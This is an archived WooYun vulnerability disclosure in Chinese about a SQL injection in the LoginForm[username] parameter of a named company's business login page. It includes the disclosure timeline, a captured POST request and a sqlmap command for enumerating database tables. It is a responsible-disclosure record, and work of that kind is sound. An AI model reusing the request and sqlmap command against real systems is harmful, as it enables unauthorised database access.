乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-21: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
:)
微影时代商业运营系统
http://biz.wepiao.com/index.php?r=/Public/login
sql注射,参数LoginForm[username]
POST /index.php?r=/Public/login HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://biz.wepiao.com/index.php?r=/Public/loginContent-Length: 116Content-Type: application/x-www-form-urlencodedAcunetix-Aspect: enabledAcunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66cAcunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=l7buavlqbb61qkee4ncuiok8s5Host: biz.wepiao.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*LoginForm%5bpassword%5d=g00dPa%24%24w0rD&LoginForm%5busername%5d=wjyvgyqg&LoginForm%5bverifyCode%5d=g00dPa%24%24w0rD
sql验证:
sqlmap.py -r f:\**\**.txt -D channel --tables --time-sec 2 -p LoginForm[username] --level 3
点到为止。
过滤
危害等级:中
漏洞Rank:8
确认时间:2015-11-24 09:47
感谢白帽子的提交
暂无